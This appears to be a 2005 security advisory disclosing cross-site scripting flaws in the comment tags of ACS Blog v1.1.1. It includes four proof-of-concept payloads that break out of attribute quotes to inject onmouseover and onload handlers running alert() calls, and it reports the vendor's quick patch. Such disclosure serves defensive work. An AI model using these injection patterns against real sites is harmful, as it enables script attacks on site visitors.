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Multiple XSS vulnerabilities in ACS Blog Mar 28 2005 09:26PM
Dan Crowley (dan crowley gmail com)


These vulnerabilities have been tested on the latest version of ACS Blog. (v1.1.1)

In the comments section of ACS Blog, it is possible to execute an XSS attack through the [link], [mail], and [img] tags, due to lack of filtering of single quotes and spaces inside the tags.

Examples/PoCs:

[link=http://www.google.com' onmouseover='alert("XSS vulnerability")' o=']Don't you wanna see where this link goes?[/link]

[mail=bugtraq (at) securityfocus (dot) com [email concealed]' onmouseover='alert("XSS vulnerability")' o=']Mr. Wiggles[/mail]

[img]http://www.example.com/image.jpg' onload='alert("XSS vulnerability")' o='[/img]

[link=http://www.google.com target=_blank'
onmouseover=a=/Vulnerability/;alert(a.source) o=']Hooray[/link]

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Vendor responded within 2 hours of notification, notified users with the security alert on its main page, and patched the vulnerabilities within another couple of hours.
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Cheers,
Dan

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